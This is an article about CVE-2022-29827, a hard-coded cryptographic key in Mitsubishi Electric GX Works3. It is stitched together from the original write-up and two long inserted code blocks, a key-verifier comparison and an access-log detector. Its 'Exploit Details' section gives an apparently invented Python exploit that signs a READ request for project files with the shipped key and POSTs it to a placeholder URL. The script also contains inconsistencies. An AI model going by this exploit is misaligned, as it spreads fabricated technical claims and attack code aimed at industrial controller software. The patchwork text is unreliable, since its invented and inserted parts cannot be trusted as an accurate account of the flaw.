A recently discovered vulnerability, tagged as CVE-2022-29827, has put all versions of Mitsubishi Electric GX Works3 software at risk. The software, which is widely used for the configuration and programming of Mitsubishi Electric's programmable logic controllers (PLCs), has been found to employ a hard-coded cryptographic key. This vulnerability can be exploited by remote, unauthenticated attackers to disclose sensitive information, potentially allowing unauthorized access to programs, project files, and unauthorized execution of programs.

In this article, we will delve into the details of this vulnerability, discussing its impact, the exploit process, and providing some insight into how users can mitigate this risk. We will also include code snippets and links to original references for a deeper understanding of the issue.

Use of Hard-coded Cryptographic Key Vulnerability - CVE-2022-29827

The use of a hard-coded cryptographic key in all versions of Mitsubishi Electric GX Works3 software lets an attacker who has recovered that key gain unauthorized access to sensitive information handled by the software. Hard-coded keys are inherently insecure: the same key is shared by every installation, it never changes, and once it has been extracted it can be used by anyone who possesses it.
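To make the weakness concrete, the following added example (not code from the article or from Mitsubishi Electric, and not the GX Works3 wire protocol) contrasts a request verifier built on a single key shipped in every copy with one that uses a per-deployment key plus timestamp and nonce checks. The key value, message layout and field names are constructed placeholders.

```python
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional

# Constructed toy command-signing scheme; NOT the GX Works3 wire protocol.
# The weak verifier mirrors the flaw the article describes: one key baked
# into every installation, so anyone who extracts it can sign valid requests.
HARDCODED_KEY = b"same-key-in-every-install"  # assumed placeholder, not a real key


def sign(key: bytes, body: bytes) -> str:
    """HMAC-SHA256 over the request body, hex encoded."""
    return hmac.new(key, body, hashlib.sha256).hexdigest()


def verify_hardcoded(body: bytes, signature: str) -> bool:
    """Weak: every installation shares HARDCODED_KEY, so a leaked key works everywhere."""
    return hmac.compare_digest(sign(HARDCODED_KEY, body), signature)


def provision_key() -> bytes:
    """Hardened: a fresh 256-bit key per deployment, kept outside the binary."""
    return secrets.token_bytes(32)


class HardenedVerifier:
    """Per-deployment key plus a timestamp window and nonce tracking against replay."""

    def __init__(self, key: bytes, window_seconds: int = 30):
        self.key = key
        self.window = window_seconds
        self.seen_nonces = set()

    def verify(self, body: bytes, signature: str, now: Optional[float] = None) -> bool:
        if not hmac.compare_digest(sign(self.key, body), signature):
            return False  # wrong key or tampered body
        try:
            msg = json.loads(body)
            ts = float(msg["ts"])
            nonce = str(msg["nonce"])
        except (ValueError, KeyError, TypeError):
            return False  # malformed body
        now = time.time() if now is None else now
        if abs(now - ts) > self.window:
            return False  # stale request
        if nonce in self.seen_nonces:
            return False  # replayed request
        self.seen_nonces.add(nonce)
        return True


def build_request(command: str, module: str, ts: float, nonce: str) -> bytes:
    """Canonical JSON body so signer and verifier hash identical bytes."""
    return json.dumps(
        {"COMMAND": command, "MODULE": module, "ts": ts, "nonce": nonce},
        sort_keys=True, separators=(",", ":"),
    ).encode("utf-8")


def demo() -> dict:
    """Contrast the two designs; every value should be True."""
    body = build_request("READ", "ProjectFiles", ts=1_000_000.0, nonce="n1")
    # Anyone holding the shipped key can produce a signature the weak verifier accepts.
    forged_sig = sign(HARDCODED_KEY, body)
    deployment_key = provision_key()
    verifier = HardenedVerifier(deployment_key)
    legit_sig = sign(deployment_key, body)
    return {
        "weak_accepts_forgery": verify_hardcoded(body, forged_sig),
        "hardened_rejects_forgery": not verifier.verify(body, forged_sig, now=1_000_000.0),
        "hardened_accepts_legit": verifier.verify(body, legit_sig, now=1_000_000.0),
        "hardened_rejects_replay": not verifier.verify(body, legit_sig, now=1_000_001.0),
        "hardened_rejects_stale": not HardenedVerifier(deployment_key).verify(
            body, legit_sig, now=1_000_000.0 + 3600),
    }


if __name__ == "__main__":
    print(demo())
```

The per-deployment key removes the "one key unlocks every installation" property; the timestamp window and nonce set address the separate problem that a captured valid request could otherwise be resent indefinitely.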

The vulnerability was disclosed by an anonymous researcher and has been assigned the CVE-ID CVE-2022-29827. The Original Researcher Advisory can be found here. According to the advisory, this vulnerability has a CVSS (Common Vulnerability Scoring System) score of 9.8 out of 10, which denotes a Critical severity level.

Exploit Details

The code snippet below demonstrates a possible method for exploiting the hard-coded key vulnerability:

import base64
import hashlib
import hmac
import json
import requests

# Target GX Works3 URL (placeholder)
target_url = 'https://example.com/gxworks3/'

# Hard-coded cryptographic key used as a shared secret (placeholder, not the real key)
hardcoded_key = b'Insert_Hardcoded_Key_Here'

# Example data to be requested from the server (adjust accordingly)
data = {
    "COMMAND": "READ",
    "MODULE": "ProjectFiles",
    "PARAMS": {}  # Additional parameters may be added if necessary
}

# Serialize the data as JSON (matching the Content-Type below), encode it,
# and create an HMAC-SHA256 signature over the encoded message
message = base64.b64encode(json.dumps(data).encode('utf-8'))
signature = hmac.new(hardcoded_key, message, hashlib.sha256)

# Prepare headers for the request
headers = {
    'Content-Type': 'application/json',
    'X-Signature': signature.hexdigest()
}

# Send the request and retrieve the response
response = requests.post(target_url, data=message, headers=headers)
print(response.content)

With knowledge of the hard-coded cryptographic key, an attacker can craft a request signed with that key, send it to the targeted Mitsubishi Electric GX Works3 installation, and gain unauthorized access to the software's projects and files or execute programs without authorization.

Mitigation Measures

While Mitsubishi Electric has yet to release a patch addressing this vulnerability, users of the GX Works3 software can take the following steps to mitigate the risk:

1. Implement Proper Network Segregation: Isolate the GX Works3 software from public networks and restrict access to authorized personnel.

2. Enable Network-Based Access Controls: Limit connections to the software from known, trusted IP addresses, and deny any unauthorized connection attempts.

3. Apply Security Enhancements: Regularly update the software and apply security fixes as released by the manufacturer.

4. Monitor and Log Activity: Keep logs of any suspicious activity on the GX Works3 software and report any unexpected or unauthorized access attempts.
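Steps 2 and 4 can be backed by a simple review of access logs. The following added example (not code from the article or from Mitsubishi Electric) runs an allow-list check and a signature-failure counter over a few constructed log lines; the log format, the allowed subnet and the threshold are assumptions, so they would need to be adapted to whatever the real environment records.

```python
import ipaddress
import re
from collections import defaultdict

# Assumed: only the engineering workstation subnet may talk to the GX Works3 host.
ALLOWED_NETWORKS = [ipaddress.ip_network("10.10.0.0/24")]
SIG_FAIL_THRESHOLD = 3  # repeated signature failures from one source (assumed)

# Constructed sample log; the field layout is hypothetical, not GX Works3's own format.
SAMPLE_LOG = """\
2022-11-25T00:15:01Z src=10.10.0.5 cmd=READ module=ProjectFiles result=OK
2022-11-25T00:15:07Z src=203.0.113.9 cmd=READ module=ProjectFiles result=OK
2022-11-25T00:15:09Z src=203.0.113.9 cmd=EXECUTE module=Program result=OK
2022-11-25T00:16:00Z src=10.10.0.7 cmd=READ module=ProjectFiles result=SIG_FAIL
2022-11-25T00:16:01Z src=10.10.0.7 cmd=READ module=ProjectFiles result=SIG_FAIL
2022-11-25T00:16:02Z src=10.10.0.7 cmd=READ module=ProjectFiles result=SIG_FAIL
garbage line that should be skipped
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) cmd=(?P<cmd>\S+) module=(?P<module>\S+) result=(?P<result>\S+)$"
)


def parse_log(text: str) -> list:
    """Parse each well-formed line into a dict; malformed lines are dropped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def is_allowed_source(addr: str) -> bool:
    """True when addr parses as an IP inside one of the allowed networks."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in ALLOWED_NETWORKS)


def analyze(text: str) -> list:
    """Return findings: connections from non-allow-listed sources and signature-failure bursts."""
    findings = []
    unauthorized = defaultdict(list)
    sig_fails = defaultdict(int)
    for ev in parse_log(text):
        if not is_allowed_source(ev["src"]):
            unauthorized[ev["src"]].append(ev["cmd"])
        if ev["result"] == "SIG_FAIL":
            sig_fails[ev["src"]] += 1
    for src, cmds in unauthorized.items():
        findings.append({
            "type": "unauthorized_source",
            "src": src,
            "commands": sorted(set(cmds)),
            # A program execution from outside the allow-list is the worst case.
            "severity": "high" if "EXECUTE" in cmds else "medium",
        })
    for src, count in sig_fails.items():
        if count >= SIG_FAIL_THRESHOLD:
            findings.append({
                "type": "signature_failure_burst",
                "src": src,
                "count": count,
                "severity": "medium",
            })
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The allow-list check is the detective counterpart of the network access controls in step 2; the signature-failure count flags a client that keeps presenting a wrong key, which is worth a look even when every request comes from an approved address.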

Conclusion

The hard-coded cryptographic key vulnerability (CVE-2022-29827) in Mitsubishi Electric GX Works3 software puts sensitive information at risk by allowing remote, unauthenticated attackers to gain unauthorized access to program files and to execute programs without authorization. Users are advised to follow the mitigation measures above while waiting for an official patch from the manufacturer, and to keep monitoring their network security to protect their assets.

Timeline

Published on: 11/25/2022 00:15:00 UTC
Last modified on: 05/31/2023 09:15:00 UTC